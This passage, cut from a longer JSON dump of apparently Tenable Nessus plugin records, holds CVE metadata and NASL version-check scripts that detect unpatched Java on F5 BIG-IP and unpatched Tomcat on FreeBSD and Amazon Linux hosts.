Director', version + ' Build ' + build);\n\nif (\n (ver_compare(ver:version, fix:fixed_ver, strict:FALSE) < 0) &&\n (build < fixed_build)\n)\n{\n report = '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fixed_ver + ' Build ' + fixed_build +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCloud Director', version + ' Build ' + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-04T14:28:22", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77;\nJava SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX. (CVE-2016-3427)", "cvss3": {}, "published": "2016-12-21T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Oracle Java SE vulnerability (K73112451)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL73112451.NASL", "href": "https://www.tenable.com/plugins/nessus/95969", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K73112451.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95969);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"F5 Networks BIG-IP : Oracle Java SE vulnerability (K73112451)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77;\nJava SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to\naffect confidentiality, integrity, and availability via vectors\nrelated to JMX. (CVE-2016-3427)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K73112451\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K73112451.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K73112451\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-04T14:39:05", "description": "The Apache Software Foundation reports :\n\nImportant: Remote Code Execution CVE-2016-8735\n\nImportant: Information Disclosure CVE-2016-6816", "cvss3": {}, "published": "2017-01-10T00:00:00", "type": "nessus", "title": "FreeBSD : tomcat -- multiple vulnerabilities (0b9af110-d529-11e6-ae1b-002590263bf5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:tomcat", "p-cpe:/a:freebsd:freebsd:tomcat7", "p-cpe:/a:freebsd:freebsd:tomcat8", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/96364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96364);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"FreeBSD : tomcat -- multiple vulnerabilities (0b9af110-d529-11e6-ae1b-002590263bf5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache Software Foundation reports :\n\nImportant: Remote Code Execution CVE-2016-8735\n\nImportant: Information Disclosure CVE-2016-6816\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=214599\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.39\");\n # https://vuxml.freebsd.org/freebsd/0b9af110-d529-11e6-ae1b-002590263bf5.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f94679a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"tomcat<6.0.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"tomcat7<7.0.73\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"tomcat8<8.0.39\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:04:05", "description": "CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat8 (ALAS-2016-778)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat8", "p-cpe:/a:amazon:linux:tomcat8-admin-webapps", "p-cpe:/a:amazon:linux:tomcat8-docs-webapp", "p-cpe:/a:amazon:linux:tomcat8-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat8-javadoc", "p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat8-lib", "p-cpe:/a:amazon:linux:tomcat8-log4j", "p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat8-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-778.NASL", "href": "https://www.tenable.com/plugins/nessus/95898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-778.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95898);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"ALAS\", value:\"2016-778\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 (ALAS-2016-778)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to\npermitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in\nJmxRemoteLifecycleListener\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2016-778.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat8' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.0.39-1.67.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.0.39-1.67.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat8 / tomcat8-admin-webapps / tomcat8-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:15:37", "description": "According to its self-reported version number, the Apache Tomcat service running on the remote host is 6.0.x prior to 6.0.48, 7.0.x prior to 7.0.73, 8.0.x prior to 8.0.39. It is, therefore, affected by multiple vulnerabilities:\n\n - A flaw exists that is triggered when handling request lines containing certain invalid characters. An unauthenticated, remote attacker can exploit this, by injecting additional headers into responses, to conduct HTTP response splitting attacks. (CVE-2016-6816)\n\n - A remote code execution vulnerability exists in the JMX listener in JmxRemoteLifecycleListener.java due to improper deserialization of Java objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-8735)\n\nNote that Nessus Network Monitor has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-05-10T00:00:00", "type": "nessus", "title": "Apache Tomcat 6.0.x < 6.0.48 / 7.0.x < 7.0.73 / 8.0.x < 8.0.39 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2019-05-10T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700668.PASL", "href": "https://www.tenable.com/plugins/nnm/700668", "sourceData": "Binary data 700668.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:03:36", "description": "CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat7 (ALAS-2016-777)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7-log4j", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-777.NASL", "href": "https://www.tenable.com/plugins/nessus/95897", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-777.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95897);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"ALAS\", value:\"2016-777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2016-777)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to\npermitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in\nJmxRemoteLifecycleListener\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2016-777.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat7' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) 